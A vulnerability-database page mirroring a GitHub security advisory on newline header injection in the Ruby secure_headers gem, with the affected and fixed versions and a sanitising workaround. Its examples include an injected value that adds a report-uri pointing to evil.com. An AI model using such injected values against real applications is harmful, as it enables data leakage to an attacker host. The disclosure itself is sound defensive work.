Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-w978-rmpf-qmwg

Опубликовано: 23 янв. 2020
Источник: github
Github: Прошло ревью
CVSS3: 4.4

Описание

Limited header injection when using dynamic overrides with user input in RubyGems secure_headers

Impact

If user-supplied input was passed into append/override_content_security_policy_directives, a newline could be injected leading to limited header injection.

Upon seeing a newline in the header, rails will silently create a new Content-Security-Policy header with the remaining value of the original string. It will continue to create new headers for each newline.

e.g.

override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"])`

would result in

Content-Security-Policy: ... script-src: mycdn.com Content-Security-Policy: injected Content-Security-Policy: rest-of-the-header

CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial:

override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"])
Content-Security-Policy: ... script-src: mycdn.com Content-Security-Policy: default-src 'none'; report-uri evil.com Content-Security-Policy: rest-of-the-header

Patches

This has been fixed in 6.3.0, 5.2.0, and 3.9.0

Workarounds

override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")])

References

https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c The effect of multiple policies

For more information

If you have any questions or comments about this advisory:

  • Open an issue in this repo
  • DM us at @ndm on twitter

Пакеты

Наименование

secure_headers

rubygems
Затронутые версииВерсия исправления

>= 6.0.0, < 6.3.0

6.3.0

Наименование

secure_headers

rubygems
Затронутые версииВерсия исправления

>= 5.0.0, < 5.2.0

5.2.0

Наименование

secure_headers

rubygems
Затронутые версииВерсия исправления

< 3.9.0

3.9.0

EPSS

Процентиль: 57%
0.00347
Низкий

4.4 Medium

CVSS3

Дефекты

CWE-113

Связанные уязвимости

CVSS3: 4.4
ubuntu
около 6 лет назад

In Secure Headers (RubyGem secure_headers), a directive injection vulnerability is present in versions before 3.9.0, 5.2.0, and 6.3.0. If user-supplied input was passed into append/override_content_security_policy_directives, a newline could be injected leading to limited header injection. Upon seeing a newline in the header, rails will silently create a new Content-Security-Policy header with the remaining value of the original string. It will continue to create new headers for each newline. This has been fixed in 6.3.0, 5.2.0, and 3.9.0.

CVSS3: 5.8
redhat
около 6 лет назад

In Secure Headers (RubyGem secure_headers), a directive injection vulnerability is present in versions before 3.9.0, 5.2.0, and 6.3.0. If user-supplied input was passed into append/override_content_security_policy_directives, a newline could be injected leading to limited header injection. Upon seeing a newline in the header, rails will silently create a new Content-Security-Policy header with the remaining value of the original string. It will continue to create new headers for each newline. This has been fixed in 6.3.0, 5.2.0, and 3.9.0.

CVSS3: 4.4
nvd
около 6 лет назад

In Secure Headers (RubyGem secure_headers), a directive injection vulnerability is present in versions before 3.9.0, 5.2.0, and 6.3.0. If user-supplied input was passed into append/override_content_security_policy_directives, a newline could be injected leading to limited header injection. Upon seeing a newline in the header, rails will silently create a new Content-Security-Policy header with the remaining value of the original string. It will continue to create new headers for each newline. This has been fixed in 6.3.0, 5.2.0, and 3.9.0.

CVSS3: 4.4
debian
около 6 лет назад

In Secure Headers (RubyGem secure_headers), a directive injection vuln ...

EPSS

Процентиль: 57%
0.00347
Низкий

4.4 Medium

CVSS3

Дефекты

CWE-113